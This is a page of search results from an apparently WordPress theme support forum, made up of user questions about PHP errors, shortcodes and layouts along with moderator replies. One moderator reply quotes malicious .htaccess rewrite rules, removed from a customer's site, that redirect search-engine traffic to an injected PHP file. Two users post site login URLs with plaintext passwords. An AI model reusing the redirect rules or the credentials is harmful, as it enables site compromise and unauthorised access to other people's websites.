Search Results for 'php'

Home Forums Search Search Results for 'php'

Viewing 15 results - 601 through 615 (of 2,000 total)
  • Author
    Search Results
  • #116070
    Marianne HonkoopMarianne Honkoop
    Member
    • Topics: 1
    • Replies: 4
    • Total: 5
    Member since: April 26, 2016

    https://mariannesportenbeweging.nl/wp-login.php?redirect_to=https%3A%2F%2Fmariannesportenbeweging.nl%2Fwp-admin%2F&reauth=1

    username: marianne
    password: joepie9

    #115630
    xlingzh6xlingzh6
    Participant
    • Topics: 8
    • Replies: 15
    • Total: 23
    Member since: September 25, 2018

    Thank you. The home page is good now. The inner page still has this problem (http://106.dbwebs.site/index.php/our-projects/).

    Please help. Thank you.

    Warm Regards,
    Xiaoling

    #115595
    Sonal S SinhaSonal S Sinha
    Moderator
    • Topics: 0
    • Replies: 31276
    • Total: 31276
    Member since: August 16, 2013

    Hi,

    Removed following code from your website’s htaccess file:

    RewriteEngine On

    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
    RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
    RewriteRule ^(.*)$ coaxed-blanketed.php?$1 [L]

    Regards,
    Brad

    #114383
    mariatannantmariatannant
    Member
    • Topics: 3
    • Replies: 8
    • Total: 11
    Member since: November 14, 2017

    Fatal error: Uncaught Error: Call to undefined method GridGalleryPro_Galleries_Model_Tags::getByPhotoIds() in /home/jdbushde/public_html/wp-content/plugins/gallery-by-supsystic/src/GridGallery/Photos/Model/Photos.php:521 Stack trace: #0 /home/jdbushde/public_html/wp-content/plugins/gallery-by-supsystic/src/GridGallery/Photos/Model/Photos.php(465): GridGallery_Photos_Model_Photos->preExtend(Array, Array) #1 /home/jdbushde/public_html/wp-content/plugins/supsystic-gallery-pro/src/GridGalleryPro/Galleries/Model/Galleries.php(55): GridGallery_Photos_Model_Photos->getPhotos(Array) #2 /home/jdbushde/public_html/wp-content/plugins/gallery-by-supsystic/src/GridGallery/Galleries/Model/Galleries.php(45): GridGalleryPro_Galleries_Model_Galleries->extend(Object(stdClass), Array) #3 /home/jdbushde/public_html/wp-content/plugins/supsystic-gallery-pro/src/GridGalleryPro/Galleries/Module.php(255): GridGallery_Galleries_Model_Galleries->getById(Array) #4 /home/jdbushde/public_html/wp-content/plugins/supsystic-gallery-pro/src/GridGalleryPro in /home/jdbushde/public_html/wp-content/plugins/gallery-by-supsystic/src/GridGallery/Photos/Model/Photos.php on line 521

    #114283

    In reply to: links on footer

    Sonal S SinhaSonal S Sinha
    Moderator
    • Topics: 0
    • Replies: 31276
    • Total: 31276
    Member since: August 16, 2013

    Hi,

    Kindly use compressjpeg.com or tinypng.com to reduce sizes and compress all your images and reupload them.

    Lastly kindly use WP Fastest Cache plugin and ask hosting to have Zend Op Cache and PHP Server cache applied to your site or if they have NGINX available get them to use that.

    With all the above steps i am sure your site will be faster. Theme is just part of the entire WordPress website ecosystem and our themes are coded to be faster.

    Rest are all generic points i mentioned here.

    Regards,
    Brad

    #114218
    julie6julie6
    Participant
    Member since: February 16, 2018

    Hello!

    I have a question about the Perfect Mechanic theme and the way it is handing pagination. I am working on a site with 82 pages of blog posts and the pagination at the bottom of the archive.php template is not handling them very well. You can see what I mean here:

    URL: http://complex-soybeans.flywheelsites.com/blog/
    username: Flywheel
    password: nice-wine

    Can you recommend how I can make that look better?

    #114203
    VatanVatan
    Participant
    Member since: December 29, 2018

    Ahoj, mám problém. Snažím sa spraviť šablónu pre kategórie článkov. Skúsil som použiť plugin SHORCODES pre kategóriu článkov.
    [su_posts template="templates/default-loop.php" id="" posts_per_page="10" post_type="post" taxonomy="category" tax_term="MATERIALY" tax_operator="IN" author="" meta_key="" offset="0" order="DESC" orderby="name" post_parent="" post_status="publish" ignore_sticky_posts="no"]

    It works but I do not like the design of my articles. I would like to be the ORIGINAL latestnews shortcode design in Decor theme.

    can you tell me how to look the file templates/default-loop.php ???
    Original code `<div class=”su-posts su-posts-default-loop”>

    <?php if ( $posts->have_posts() ) : ?>

    <?php while ( $posts->have_posts() ) : $posts->the_post(); ?>

    <div id=”su-post-<?php the_ID(); ?>” class=”su-post”>

    <?php if ( has_post_thumbnail( get_the_ID() ) ) : ?>
    <a class=”su-post-thumbnail” href=”<?php the_permalink(); ?>”><?php the_post_thumbnail(); ?></a>
    <?php endif; ?>

    <h2 class=”su-post-title”><a href=”<?php the_permalink(); ?>”><?php the_title(); ?></a></h2>

    <div class=”su-post-excerpt”>
    <?php the_excerpt(); ?>
    </div>

    </div>

    <?php endwhile; ?>

    <?php else : ?>
    <h4><?php _e( ‘Posts not found’, ‘shortcodes-ultimate’ ); ?></h4>
    <?php endif; ?>

    </div>
    `

    My “work” to achieve design:

    <?php
    
        function latestpostsoutput_func( $atts ){
       extract( shortcode_atts( array(
    		'templat' => '',
    		'excerpt_length' => '',
    		'readmore' => '',
            'template' => 'templates/default-loop.php',
            'id' => '',
            'posts_per_page' => '',
            'post_type' => '',
            'taxonomy' => '',
            'tax_term' => '',
            'tax_operator' => '',
            'autor' => '',
            'meta_key' => '',
            'offset' => '',
            'order' => '',
            'orderby' => '',
            'post_parent' => '',
            'post_status' => '',
            'ignore_sticky_post' => '',
           
    	), $atts ) );
    	$postoutput = '';
    	wp_reset_query();
    	$n = 0;
    	query_posts(  array( 'posts_per_page'=>$show, 'post__not_in' => get_option('sticky_posts') )  );
    		while ( have_posts() ) : the_post();  
    			$n++;
    			if( $n%2==0 )  $nomgn = 'last';	else $nomgn = ' ';
    			if ( has_post_thumbnail()) {
    				$large_imgSrc = wp_get_attachment_image_src( get_post_thumbnail_id(), 'large');
    				$imgUrl = $large_imgSrc[0];
    			}else{
    				$imgUrl = get_template_directory_uri().'/images/img_404.png';
    			}
    			$postoutput .= '     
    			<div class="news-box '.$nomgn.'">          
    								<div class="news-thumb">
    									<a href="'.get_the_permalink().'"><img src="'.$imgUrl.'" alt=" " /></a>
    								</div>
    								<div class="news">
    									<a href="'.get_permalink().'"><h3>'.get_the_title().'</h3></a>
    
    				     '.wp_trim_words( get_the_content(), $excerpt_length, '...' ).'
    ; 
    				   <a href="'.get_permalink().'" class="news-link">'.$readmore.'</a>
    			    </div>
    			</div>';
     						$postoutput .= ''.(($n%2==0) ? '<div class="clear"></div>' : '');	
    		endwhile;
    
    	wp_reset_query();
    	return $postoutput;
          }     
          
     add_shortcode( 'latestposts', 'latestpostsoutput_func' );     
          
              ?>
    

    Please help, I’m going to categorize
    The original shortcode does not work
    [latestposts show="2" excerpt_length="20" cat="" readmore="READ MORE"]

    I mean the division of cat = “”

    Thank you for your answer and help

    #114146
    VatanVatan
    Participant
    Member since: December 29, 2018

    Hello, my gallery does not work as a demo version before payment. We have added categories, but they are as if they are empty.
    Visit: https://stolarstvoidunk.eu/galeria/ – click on category
    Demo visit: https://www.sktperfectdemo.com/demos/decor/index.php/gallery/ – click on category

    #114116
    rafael.sanchez-morenorafael.sanchez-moreno
    Participant
    Member since: September 29, 2017

    Hi, I am using Girlie Pro theme and when I upgrade to PHP 7.1 I receive an error message:

    Too few arguments to function get_day_link(), 0 passed in /homepages/41/d676814423/htdocs/wp_frauennoraendlicher/wp-content/themes/skt-girlie-pro/inc/custom-functions.php on line 821 and exactly 3 expected

    How can I solve this issue?

    #113868
    YvesYves
    Participant
    • Topics: 1
    • Replies: 3
    • Total: 4
    Member since: April 21, 2016

    Oh boy, this is so simple it’s almost embarrassing! Thank you, it worked perfectly. I didn’t put it in the Custom CSS portion of the Customizer but in the styling sheet of a child theme I linked to the parent farming theme. Your answer was perfect considering my absolutely novice question, but the child theme will work better in the long term. Now I have to spend much needed time on improving my knowledge of css, php and wordpress so I don’t ask such questions again.

    On an unrelated subject you might be interested to know that your themes work beautifully with WPML users. The easiest (and quickest way) for novice users like me to translate fields in the Appearance Customizer is to use the WMPL shortcodes and the WMPL string translation. I just register new strings as I go in each field (example below) and then translate them in WPML string translation.

    Reference: https://wpml.org/documentation/support/wpml-coding-api/shortcodes/

    Anyways, many thanks, love your themes and will continue to refer people to your site!

    Regards,
    Yves

    #113620
    Sonal S SinhaSonal S Sinha
    Moderator
    • Topics: 0
    • Replies: 31276
    • Total: 31276
    Member since: August 16, 2013

    Hi,

    Kindly edit inc/custom-functions.php and go to line number 580.

    Regards,
    Chris

    #113535
    neuendorfneuendorf
    Participant
    • Topics: 9
    • Replies: 13
    • Total: 22
    Member since: November 20, 2018

    Here we go: http://sunset-sonnenstudio.com/index.php/kontakt/

    #113163

    In reply to: coworking theme

    LauraLaura
    Participant
    • Topics: 158
    • Replies: 195
    • Total: 353
    Member since: July 21, 2016

    Thank you the code in PHP worked on line 39.
    Here is a link to a screen shot of the header. https://imgur.com/a/95i8PxD
    The top one is the header on team member page, the bottom picture is of the header on Home page and every page of the website.
    No matter what we try to do to single team member page, we can’t get the header to look the same.
    Please, help.

    #113158
    Adam MoyerAdam Moyer
    Participant
    Member since: May 7, 2015

    The Simple Custom Post order plugin that you installed on my site it blocking almost all of the links. I cannot even login to my wordpress to disable it or try to fix anything:

    http://soundfactordj.com/wp-admin/options.php/

    Fatal error: Can’t use method return value in write context in /home1/ab80373/public_html/wp-content/plugins/simple-custom-post-order/simple-custom-post-order.php on line 49

    PLEASE HELP!

    #113141

    In reply to: coworking theme

    Sonal S SinhaSonal S Sinha
    Moderator
    • Topics: 0
    • Replies: 31276
    • Total: 31276
    Member since: August 16, 2013

    Hi,

    Kindly go single-team.php line number 29 and remove parenthesis there.

    Regards,
    Dave

Viewing 15 results - 601 through 615 (of 2,000 total)